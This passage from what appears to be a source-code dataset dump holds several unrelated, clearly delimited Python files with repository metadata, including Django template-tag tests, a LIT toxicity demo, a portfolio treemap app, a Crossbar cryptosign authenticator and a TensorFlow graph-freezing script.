"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_detail.html')
self.assertEqual(detail, expected_detail)
def test_with_specific_fields(self):
"""Test that the included fields spec is respected"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% with pepulator_factory_pepulator_fields="serial_number, color, height, width" %}'
'{% detail_block pepulator %}'
'{% endwith %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"color,color,red,"
"height,height,12,"
"width,width,15,"
)
detail = template.render(context)
self.assertEqual(detail, expected_detail)
def test_with_excluded_fields(self):
"""Test that the excluded fields spec is respected"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}'
'{% detail_block pepulator %}'
'{% endwith %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"distributed_by,distributed by,Walmart,"
)
detail = template.render(context)
self.assertEqual(detail, expected_detail)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% detail_block pepulator "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% detail_block %}'))
class TeaserBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_tag_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}'
'{% teaser_block pepulator %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_teaser = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
teaser = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_teaser.html')
self.assertEqual(teaser, expected_teaser)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% teaser_block pepulator "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% teaser_block %}'))
class ListBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'))
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}'
'{% list_block pepulators %}'
'{% endwith %}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_list.html')
self.assertEqual(rendering, expected_rendering)
def test_fail_on_wrong_number_of_arguments(self):
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% list_block pepulators "overflow" %}'))
self.assertRaises(TemplateSyntaxError, Template,
('{% load model_tags %}'
'{% list_block %}'))
class ModelBlockModuleTest (TestCase):
def test_all_tags_and_filters_loaded(self):
template = Template(('{% load model_blocks %}'
'{% detail_block pepulator %}'
'{% list_block pepulators %}'
'{{ pepulator|as_detail_block }}'
'{{ pepulators|as_list_block }}'))
# We just care that everything loaded, and we were able to get here
# without incidence.
self.assert_(True)
class SideEffectsTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}'))
def test_model_doesnt_carry_over_into_future_blocks(self):
template = Template(('{% load model_tags %}'
'{{ model }}'
'{% list_block distributors %}'
'{{ model }}'))
distributor_list = Distributor.objects.all()
context = Context({'model':'My String',
'distributors':distributor_list})
expected_rendering = (u"My String"
"Distributors"
"My String")
rendering = template.render(context)
self.assertEqual(rendering, expected_rendering)
| 44.453782
| 304
| 0.578544
| 20,680
| 0.977316
| 0
| 0
| 0
| 0
| 0
| 0
| 9,265
| 0.437854
|
3bd65ecba92bc72c9d3f44c46609ce82742a80af
| 1,794
|
py
|
Python
|
lit_nlp/examples/toxicity_demo.py
|
ghostian/lit
|
891673ef120391f4682be4478881fdb408241f82
|
[
"Apache-2.0"
] | null | null | null |
lit_nlp/examples/toxicity_demo.py
|
ghostian/lit
|
891673ef120391f4682be4478881fdb408241f82
|
[
"Apache-2.0"
] | null | null | null |
lit_nlp/examples/toxicity_demo.py
|
ghostian/lit
|
891673ef120391f4682be4478881fdb408241f82
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
r"""LIT Demo for a Toxicity model.
To run locally:
python -m lit_nlp.examples.toxicity_demo --port=5432
Once you see the ASCII-art LIT logo, navigate to localhost:5432 to access the
demo UI.
"""
from absl import app
from absl import flags
from absl import logging
from lit_nlp import dev_server
from lit_nlp import server_flags
from lit_nlp.examples.datasets import classification
from lit_nlp.examples.models import glue_models
TOXICITY_MODEL_PATH = "https://storage.googleapis.com/what-if-tool-resources/lit-models/toxicity.tar.gz" # pylint: disable=line-too-long
import transformers
TOXICITY_MODEL_PATH = transformers.file_utils.cached_path(TOXICITY_MODEL_PATH,
extract_compressed_file=True)
# NOTE: additional flags defined in server_flags.py
FLAGS = flags.FLAGS
FLAGS.set_default("development_demo", True)
flags.DEFINE_string("model_path", TOXICITY_MODEL_PATH,
"Path to save trained model.")
flags.DEFINE_integer(
"max_examples", 1000, "Maximum number of examples to load into LIT. ")
def main(_):
model_path = FLAGS.model_path
logging.info("Working directory: %s", model_path)
# Load our trained model.
models = {"toxicity": glue_models.ToxicityModel(model_path)}
datasets = {"toxicity_test": classification.ToxicityData("test")}
# Truncate datasets if --max_examples is set.
for name in datasets:
logging.info("Dataset: '%s' with %d examples", name, len(datasets[name]))
datasets[name] = datasets[name].slice[:FLAGS.max_examples]
logging.info(" truncated to %d examples", len(datasets[name]))
# Start the LIT server. See server_flags.py for server options.
lit_demo = dev_server.Server(models, datasets, **server_flags.get_flags())
lit_demo.serve()
if __name__ == "__main__":
app.run(main)
| 30.931034
| 137
| 0.755295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 757
| 0.421962
|
3bd7deac97fd990b363d6a3492c5b97386f321f3
| 2,669
|
py
|
Python
|
portifolio_analysis.py
|
lucasHashi/app-calculate-stock-portifolio-division
|
1e2d852215db29f9768bf509d2f52bdec5988ad4
|
[
"MIT"
] | null | null | null |
portifolio_analysis.py
|
lucasHashi/app-calculate-stock-portifolio-division
|
1e2d852215db29f9768bf509d2f52bdec5988ad4
|
[
"MIT"
] | null | null | null |
portifolio_analysis.py
|
lucasHashi/app-calculate-stock-portifolio-division
|
1e2d852215db29f9768bf509d2f52bdec5988ad4
|
[
"MIT"
] | null | null | null |
import pandas as pd
import streamlit as st
import plotly.graph_objects as go
import plotly.express as px
import plotly.io as pio
pio.templates.default = "plotly_white"
def load_portifolio_analysis(df_stocks_and_grades):
st.write('# Portifolio analysis')
st.write('## Investments by sector and sub sector')
# fig_sunburst_stocks = load_sunburst_figure(df_stocks_and_grades)
# st.write(fig_sunburst_stocks)
fig_treemap_stocks = load_treemap_figure(df_stocks_and_grades)
st.write(fig_treemap_stocks)
def load_sunburst_figure(df):
df_stocks_hierarchy = calculate_stocks_hierarchy(df)
st.write(df_stocks_hierarchy)
fig_sunburst_stocks = go.Figure(go.Sunburst(
labels=df_stocks_hierarchy['labels'],
parents=df_stocks_hierarchy['parents'],
values=df_stocks_hierarchy['values']
))
return fig_sunburst_stocks
def load_treemap_figure(df):
fig_treemap_stocks = px.treemap(
df,
path=['sector', 'sub_sector', 'stock'],
values='grade',
hover_name='investment',
)
df_stocks_hierarchy = calculate_stocks_hierarchy(df)
fig_treemap_stocks = go.Figure(
go.Treemap(
labels=df_stocks_hierarchy['labels'],
parents=df_stocks_hierarchy['parents'],
values=df_stocks_hierarchy['values'],
customdata = df_stocks_hierarchy['values_text'],
hovertemplate='<b>%{label} </b> <br>%{customdata}',
)
)
return fig_treemap_stocks
def calculate_stocks_hierarchy(df):
sectors_duplicated = list(df.loc[df['sector'] == df['sub_sector'], 'sector'])
df['sector'] = df['sector'].apply(lambda sector: sector + '.' if sector in sectors_duplicated else sector)
labels = ['Stocks'] + list(df['sector']) + list(df['sub_sector']) + list(df['stock'])
parents = ['']
parents = parents + ['Stocks'] * len(list(df['sector']))
parents = parents + list(df['sector'])
parents = parents + list(df['sub_sector'])
values = [0] * (len(df) * 2 + 1)
values = values + list(df['investment'])
values_text = [df['investment'].sum()]
values_text = values_text + [df[(df['sector'] == stock) | (df['sub_sector'] == stock) | (df['stock'] == stock)]['investment'].sum() for stock in labels[1:]]
values_text = ["R$ " + "%.2f" % value for value in values_text]
df_stocks_hierarchy = pd.DataFrame({'labels': labels, 'parents': parents, 'values': values, 'values_text': values_text})
df_stocks_hierarchy.drop_duplicates(subset=['parents', 'labels'], inplace=True)
df_stocks_hierarchy.reset_index(drop=True, inplace=True)
return df_stocks_hierarchy
| 32.54878
| 160
| 0.671787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 569
| 0.213188
|
3bd99b382f3bb66011f0a2e220815e6d5fe49246
| 864
|
py
|
Python
|
clicrud/clicrud/helpers.py
|
DavidJohnGee/clicrud
|
f1f178ac44649efe7b7681d37e97d2632b8971b2
|
[
"Apache-2.0"
] | 9
|
2015-12-07T23:00:24.000Z
|
2021-06-23T21:31:47.000Z
|
clicrud/clicrud/helpers.py
|
DavidJohnGee/clicrud
|
f1f178ac44649efe7b7681d37e97d2632b8971b2
|
[
"Apache-2.0"
] | 8
|
2016-04-05T12:36:54.000Z
|
2017-05-15T16:00:08.000Z
|
clicrud/clicrud/helpers.py
|
DavidJohnGee/clicrud
|
f1f178ac44649efe7b7681d37e97d2632b8971b2
|
[
"Apache-2.0"
] | 7
|
2016-06-02T23:39:05.000Z
|
2021-03-25T20:52:46.000Z
|
"""
Copyright 2015 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
def getpid():
_strPID = ""
if hasattr(os, 'getpid'): # only available on Unix
_strPID = os.getpid()
return _strPID
def cls():
OS = {
'posix': 'clear',
'nix': 'cls',
'nt': 'cls'
}
os.system(OS.get(os.name))
| 24.685714
| 72
| 0.689815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 651
| 0.753472
|
3bd9caeeddf847dd9546e4e833234ce3cce7f394
| 28
|
py
|
Python
|
patton_server/service/__init__.py
|
directionless/patton-server
|
da39cb8b09029dbcf4edd5c78abb150dc53e8ebe
|
[
"Apache-2.0"
] | null | null | null |
patton_server/service/__init__.py
|
directionless/patton-server
|
da39cb8b09029dbcf4edd5c78abb150dc53e8ebe
|
[
"Apache-2.0"
] | null | null | null |
patton_server/service/__init__.py
|
directionless/patton-server
|
da39cb8b09029dbcf4edd5c78abb150dc53e8ebe
|
[
"Apache-2.0"
] | null | null | null |
from .make_web_app import *
| 14
| 27
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3bda0b8e560a339719620c78e288885bd05aa2f6
| 689
|
py
|
Python
|
lib/abridger/exc.py
|
willangenent/abridger
|
6daa80f7360339376b38544ce60694c5addaa30f
|
[
"MIT"
] | 8
|
2016-10-19T14:15:34.000Z
|
2020-06-23T09:37:02.000Z
|
lib/abridger/exc.py
|
freewilll/abridger
|
6daa80f7360339376b38544ce60694c5addaa30f
|
[
"MIT"
] | null | null | null |
lib/abridger/exc.py
|
freewilll/abridger
|
6daa80f7360339376b38544ce60694c5addaa30f
|
[
"MIT"
] | null | null | null |
class AbridgerError(Exception):
pass
class ConfigFileLoaderError(AbridgerError):
pass
class IncludeError(ConfigFileLoaderError):
pass
class DataError(ConfigFileLoaderError):
pass
class FileNotFoundError(ConfigFileLoaderError):
pass
class DatabaseUrlError(AbridgerError):
pass
class ExtractionModelError(AbridgerError):
pass
class UnknownTableError(AbridgerError):
pass
class UnknownColumnError(AbridgerError):
pass
class InvalidConfigError(ExtractionModelError):
pass
class RelationIntegrityError(ExtractionModelError):
pass
class GeneratorError(Exception):
pass
class CyclicDependencyError(GeneratorError):
pass
| 13.509804
| 51
| 0.776488
| 652
| 0.946299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3bdb6220329725e793142bac8d5000ba99303cc3
| 989
|
py
|
Python
|
common/permissions.py
|
pedro-hs/financial-account
|
7e8e4d0f3ac888fa36a091d0e733a8e1926180d2
|
[
"MIT"
] | null | null | null |
common/permissions.py
|
pedro-hs/financial-account
|
7e8e4d0f3ac888fa36a091d0e733a8e1926180d2
|
[
"MIT"
] | null | null | null |
common/permissions.py
|
pedro-hs/financial-account
|
7e8e4d0f3ac888fa36a091d0e733a8e1926180d2
|
[
"MIT"
] | null | null | null |
from rest_framework.permissions import BasePermission, IsAuthenticated
class IsBackOffice(BasePermission):
def has_permission(self, request, view):
return bool(request.user and request.user.is_authenticated and request.user.role == 'collaborator')
class IsUserBase(IsAuthenticated):
def has_permission(self, request, view):
return bool(request.user and request.user.is_authenticated and
request.user.role in ('customer', 'collaborator'))
class IsUser(IsUserBase):
def has_object_permission(self, request, view, instance):
if request.user.role == 'collaborator':
return True
return request.user.role == 'customer' and instance.user == request.user
class IsUserCompany(IsUserBase):
def has_object_permission(self, request, view, instance):
if request.user.role == 'collaborator':
return True
return request.user.role == 'customer' and instance.company.user == request.user
| 34.103448
| 107
| 0.706775
| 906
| 0.916077
| 0
| 0
| 0
| 0
| 0
| 0
| 86
| 0.086957
|
3bdba7505ba48dff77d09ed882c1ad53fae133f6
| 956
|
py
|
Python
|
mcp_generation/mcqa_formatter.py
|
yuchenlin/XCSR
|
ace4336de98a8567fcad43498907e0efefe70de4
|
[
"MIT"
] | 16
|
2021-06-14T00:54:28.000Z
|
2022-03-06T08:52:21.000Z
|
mcp_generation/mcqa_formatter.py
|
yuchenlin/XCSR
|
ace4336de98a8567fcad43498907e0efefe70de4
|
[
"MIT"
] | null | null | null |
mcp_generation/mcqa_formatter.py
|
yuchenlin/XCSR
|
ace4336de98a8567fcad43498907e0efefe70de4
|
[
"MIT"
] | 2
|
2021-08-02T18:54:33.000Z
|
2021-09-20T05:37:02.000Z
|
import json
probes = []
with open("./multilingual_probes.jsonl",'r') as f:
for line in f:
probes.append(json.loads(line.rstrip('\n|\r')))
results = []
for probe in probes:
new_items = {}
answer_labels = ["A", "B", "C", "D", "E","F","G","H"]
print(probe["truth_id"])
answerKey = answer_labels[probe["truth_id"]]
new_items["id"] = probe["id"]
new_items["lang"] = probe["langs"]
new_items["question"] = {"stem": " "}
new_items["question"]["choices"] = [{"label": l , "text":t} for l,t in zip(answer_labels, probe["probes"])]
new_items["answerKey"] = answerKey
results.append(new_items)
with open('/path/to/mcp_data/train.jsonl','w') as f:
for result in results[:-1000]:
json.dump(result,f, ensure_ascii=False)
f.write('\n')
with open('/path/to/mcp_data/dev.jsonl','w') as f:
for result in results[-1000:]:
json.dump(result,f, ensure_ascii=False)
f.write('\n')
| 29.875
| 111
| 0.599372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 248
| 0.259414
|
3bdc4d0f00442b263a279d7821b9572ea9833620
| 2,016
|
py
|
Python
|
tests/test_behavior.py
|
beskyfil/labels
|
0a1e4831621ce2027ebc9af3e4161f03ff946a6d
|
[
"MIT"
] | null | null | null |
tests/test_behavior.py
|
beskyfil/labels
|
0a1e4831621ce2027ebc9af3e4161f03ff946a6d
|
[
"MIT"
] | null | null | null |
tests/test_behavior.py
|
beskyfil/labels
|
0a1e4831621ce2027ebc9af3e4161f03ff946a6d
|
[
"MIT"
] | null | null | null |
import pytest
from labelsync.github import Github
from labelsync.helpers import HTTPError
from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels
c = create_cfg_env('good.cfg')
github = Github(c, name='github', api_url='https://api.github.com/repos')
label = {
'name':'blabla',
'color':'aa11bb',
'description':'whatever'
}
label_bug = {
'name':'bug',
'color':'d73a4a',
'description':'Something isn\'t working'
}
label_new_bug = {
'name':'ERROR',
'color':'ffffff',
'description':'ERROR'
}
def test_create_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.create_label('beskyfil', 'testing_repo', label)
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after - 1
assert 'blabla' not in labels_before
assert 'blabla' in labels_after
def test_delete_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.delete_label('beskyfil', 'testing_repo', label['name'])
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after + 1
assert 'blabla' in labels_before
assert 'blabla' not in labels_after
def test_edit_label():
labels_before = get_labels('beskyfil', 'testing_repo')
num_labels_before = len(labels_before)
github.edit_label('beskyfil', 'testing_repo', label_new_bug, 'bug')
labels_after = get_labels('beskyfil', 'testing_repo')
num_labels_after = len(labels_after)
assert num_labels_before == num_labels_after
assert 'bug' in labels_before
assert 'bug' not in labels_after
assert 'ERROR' in labels_after
assert 'ERROR' not in labels_before
#revert
github.edit_label('beskyfil', 'testing_repo', label_bug, 'ERROR')
| 28.8
| 73
| 0.695933
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 534
| 0.264881
|
3bdfbd90f140aef1f2b7005698a05751030fadf0
| 4,249
|
py
|
Python
|
authentication/cryptosign/function/authenticator.py
|
oberstet/crossbar-examples
|
852680eee646cf5479bff18ec727a8026d9bdcda
|
[
"Apache-2.0"
] | null | null | null |
authentication/cryptosign/function/authenticator.py
|
oberstet/crossbar-examples
|
852680eee646cf5479bff18ec727a8026d9bdcda
|
[
"Apache-2.0"
] | null | null | null |
authentication/cryptosign/function/authenticator.py
|
oberstet/crossbar-examples
|
852680eee646cf5479bff18ec727a8026d9bdcda
|
[
"Apache-2.0"
] | null | null | null |
import copy
import random
from pprint import pformat
from txaio import make_logger
from autobahn.wamp.exception import ApplicationError
from autobahn.util import hl, hltype, hlid, hlval
# a simple principals database. in real world use, this likey would be
# replaced by some persistent database used to store principals.
PRINCIPALS = [
{
# when a session is authenticating use one of the authorized_keys,
# then assign it all the data below
"authid": "client01@example.com",
"realm": "devices",
"role": "device",
"extra": {
"foo": 23
},
"authorized_keys": [
"545efb0a2192db8d43f118e9bf9aee081466e1ef36c708b96ee6f62dddad9122"
]
},
{
"authid": "client02@example.com",
"realm": "devices",
"role": "device",
"extra": {
"foo": 42,
"bar": "baz"
},
"authorized_keys": [
"9c194391af3bf566fc11a619e8df200ba02efb35b91bdd98b424f20f4163875e",
"585df51991780ee8dce4766324058a04ecae429dffd786ee80839c9467468c28"
]
}
]
log = make_logger()
async def create_authenticator(config, controller):
"""
Creates and returns a function to do authentication. The actual
authentication method will be called like:
authenticate(realm, authid, session_details)
Note that this function can itself do async work (as can the
"authenticate" method). For example, we could connect to a
database here (and then use that connection in the authenticate()
method)
'controller' will be None unless `"expose_controller": true` is in
the config.
"""
log.info(
'create_authenticator(config={config}) {func}',
config=pformat(config),
func=hltype(create_authenticator),
)
pubkey_to_principals = {}
for p in PRINCIPALS:
for k in p['authorized_keys']:
if k in pubkey_to_principals:
raise Exception("ambiguous key {}".format(k))
else:
pubkey_to_principals[k] = p
async def authenticate(realm, authid, details):
"""
this is our dynamic authenticator procedure that will be called by Crossbar.io
when a session is authenticating
"""
log.info(
'authenticate(realm="{realm}", authid="{authid}", details={details}) {func}',
realm=hl(realm),
authid=hl(authid),
details=details,
func=hltype(create_authenticator),
)
assert('authmethod' in details)
assert(details['authmethod'] == 'cryptosign')
assert('authextra' in details)
assert('pubkey' in details['authextra'])
pubkey = details['authextra']['pubkey']
log.info(
'authenticating session using realm="{realm}", pubkey={pubkey} .. {func}',
realm=hl(realm),
pubkey=hl(pubkey),
func=hltype(create_authenticator),
)
if pubkey in pubkey_to_principals:
principal = pubkey_to_principals[pubkey]
auth = {
'pubkey': pubkey,
'realm': principal['realm'],
'authid': principal['authid'],
'role': principal['role'],
'extra': principal['extra'],
'cache': True
}
# Note: with WAMP-cryptosign, even though a client may or may not request a `realm`, but in any case, the
# effective realm the client is authenticated will be returned in the principal `auth['role']` (!)
effective_realm = auth['realm']
log.info(
'found valid principal authid="{authid}", authrole="{authrole}", realm="{realm}" matching given client public key {func}',
func=hltype(create_authenticator),
authid=hl(auth['authid']),
authrole=hl(auth['role']),
realm=hl(effective_realm),
)
return auth
else:
msg = 'no principal with matching public key 0x{}'.format(pubkey)
log.warn(msg)
raise ApplicationError('com.example.no_such_user', msg)
return authenticate
| 33.195313
| 138
| 0.589786
| 0
| 0
| 0
| 0
| 0
| 0
| 3,102
| 0.730054
| 2,044
| 0.481054
|
3bdfdc921f29e9f07e8dacf34bfc075882611de3
| 1,368
|
py
|
Python
|
syd/syd_stitch_image.py
|
OpenSyd/syd
|
0f7478c7dedb623ab955e906c103cb64a7abb4b3
|
[
"Apache-2.0"
] | 4
|
2015-07-29T19:10:35.000Z
|
2020-11-17T07:48:41.000Z
|
syd/syd_stitch_image.py
|
OpenSyd/syd
|
0f7478c7dedb623ab955e906c103cb64a7abb4b3
|
[
"Apache-2.0"
] | 9
|
2015-05-14T09:07:37.000Z
|
2022-03-15T10:13:59.000Z
|
syd/syd_stitch_image.py
|
OpenSyd/syd
|
0f7478c7dedb623ab955e906c103cb64a7abb4b3
|
[
"Apache-2.0"
] | 3
|
2016-09-07T06:26:52.000Z
|
2016-10-04T12:29:03.000Z
|
#!/usr/bin/env python3
import itk
import syd
# -----------------------------------------------------------------------------
def stitch_image(db, image1, image2):
print('image1', image1)
print('image2', image2)
im1 = syd.read_itk_image(db, image1)
im2 = syd.read_itk_image(db, image2)
im = stitch_itk_image(im1, im2)
print('TODO: insert an image')
return im
# -----------------------------------------------------------------------------
def stitch_itk_image(im1, im2):
# FIXME -> to put in a external file itk related
# check image size and type
# FIXME
# create an image
ImageType = type(im1)
print(ImageType)
image = ImageType.New()
# get sizes
region1 = im1.GetLargestPossibleRegion()
region2 = im2.GetLargestPossibleRegion()
a1 = im1.TransformIndexToPhysicalPoint(region1.GetIndex())
b1 = im1.TransformIndexToPhysicalPoint(region1.GetSize())
a2 = im2.TransformIndexToPhysicalPoint(region2.GetIndex())
b2 = im2.TransformIndexToPhysicalPoint(region2.GetSize())
print(a1, b1)
print(a2, b2)
# create new size
za = min(a1[2], a2[2], b1[2], b2[2])
zb = max(a1[2], a2[2], b1[2], b2[2])
# swap if decreasing coordinates
if (a1[2]>b1[2]):
zb,za = za,zb
a = a1
a[2] = za
b = b1
b[2] = zb
print(a, b)
return image
| 23.186441
| 79
| 0.557749
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 378
| 0.276316
|
3be0272cc4ef59d691881a66ca66a56c66ec41a0
| 2,617
|
py
|
Python
|
pylinear/h5table/ddt.py
|
npirzkal/pyLINEAR
|
00419dcbd91ea7b64386e6fe4f3164cd141333f2
|
[
"MIT"
] | null | null | null |
pylinear/h5table/ddt.py
|
npirzkal/pyLINEAR
|
00419dcbd91ea7b64386e6fe4f3164cd141333f2
|
[
"MIT"
] | null | null | null |
pylinear/h5table/ddt.py
|
npirzkal/pyLINEAR
|
00419dcbd91ea7b64386e6fe4f3164cd141333f2
|
[
"MIT"
] | null | null | null |
import numpy as np
import pdb
from . import columns
from . import h5utils
from .base import Base
class DDT(Base):
def __init__(self,segid):
self.segid=segid
self.pix=[]
self.xyg=columns.XYG()
self.wav=columns.WAV()
self.val=columns.VAL()
def extend(self,xyg,wav,val):
assert(len(xyg)==len(wav)==len(val)),'Must have same lengths'
self.xyg.extend(xyg)
self.wav.extend(wav)
self.val.extend(val)
def select(self,g):
if len(self)!=0 and len(g)!=0:
xyg,wav,val=[],[],[]
for i in g:
xyg.append(self.xyg[i])
wav.append(self.wav[i])
val.append(self.val[i])
self.xyg=columns.XYG(xyg)
self.wav=columns.WAV(wav)
self.val=columns.VAL(val)
def __str__(self):
return '{} for {}'.format(self.ttype,self.name)
def npix(self):
return len(self.pix)
def __len__(self):
return len(self.xyg)
def __getitem__(self,key):
return self.xyg[key],self.wav[key],self.val[key]
def __imul__(self,values):
self.val=columns.VAL([s*v for s,v in zip(self.val,values)])
return self
def __eq__(self,other):
if isinstance(self,other.__class__):
return self.__dict__==other.__dict__
else:
return False
@property
def name(self):
return '{}'.format(self.segid)
def writeH5(self,grp,**kwargs):
new=grp.require_group(self.name)
#new=grp.create_group(self.name)
for k,v in kwargs.items():
h5utils.writeAttr(new,k,v)
data=h5utils.writeData(new,self.ttype,self.xyg,self.wav,self.val)
pix=list(zip(*self.pix))
x=columns.X()
x.extend(list(pix[0]))
y=columns.Y()
y.extend(list(pix[1]))
pix=h5utils.writeData(new,'pix',x,y)
return new
def readH5(self,grp):
if self.name in grp:
new=grp[self.name]
data=h5utils.loadData(new,self.ttype)
self.xyg=columns.XYG(data['xyg'])
self.wav=columns.WAV(data['wav'])
self.val=columns.VAL(data['val'])
pix=h5utils.loadData(new,'pix')
self.pix=list(zip(list(pix['x']),list(pix['y'])))
else:
self.notFound()
#data=h5utils.loadData(grp)
#self.xyg=columns.XYG(data['xyg'])
#self.wav=columns.WAV(data['wav'])
#self.val=columns.VAL(data['val'])
| 24.231481
| 75
| 0.534964
| 2,509
| 0.958731
| 0
| 0
| 68
| 0.025984
| 0
| 0
| 231
| 0.088269
|
3be1c731ef6e27de1ae8fcab0e00a570b8b671ef
| 851
|
py
|
Python
|
tools/auto_freeze.py
|
airacid/pruned-face-detector
|
ef587e274ccf87633af653694890eb6712d6b3eb
|
[
"MIT"
] | 1
|
2021-11-01T02:39:36.000Z
|
2021-11-01T02:39:36.000Z
|
tools/auto_freeze.py
|
airacid/pruned-face-detector
|
ef587e274ccf87633af653694890eb6712d6b3eb
|
[
"MIT"
] | null | null | null |
tools/auto_freeze.py
|
airacid/pruned-face-detector
|
ef587e274ccf87633af653694890eb6712d6b3eb
|
[
"MIT"
] | 1
|
2021-11-01T02:39:37.000Z
|
2021-11-01T02:39:37.000Z
|
import os
import tensorflow as tf
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt_path', type=str)
parser.add_argument('--output_path', type=str)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
checkpoint = args.ckpt_path
##input_checkpoint
input_checkpoint = checkpoint
##input_graph
input_meta_graph = input_checkpoint + '.meta'
##output_node_names
output_node_names='tower_0/images,tower_0/boxes,tower_0/scores,tower_0/labels,tower_0/num_detections,training_flag'
#output_graph
output_graph = os.path.join(args.output_path,'detector.pb')
print('excuted')
command="python tools/freeze.py --input_checkpoint %s --input_meta_graph %s --output_node_names %s --output_graph %s"\
%(input_checkpoint,input_meta_graph,output_node_names,output_graph)
os.system(command)
| 29.344828
| 119
| 0.774383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 356
| 0.418331
|
3be1c8da8fb0704e33d69f4791863e002d5b116a
| 2,045
|
py
|
Python
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 5
|
2020-07-14T07:48:10.000Z
|
2021-12-20T21:20:10.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 7
|
2021-03-26T03:13:38.000Z
|
2022-03-12T00:42:03.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 1
|
2021-02-16T07:04:25.000Z
|
2021-02-16T07:04:25.000Z
|
from django.db import models
# 1. Django不支持符合主键(Composite Primary Key).
# 2. Django不支持关闭主键(Disable Primary Key),
# 当表中的所有字段都没有定义 Primary Key 时,
# Django会自动增加一个id字段, 并将primary key设定到id字段上.
#
#
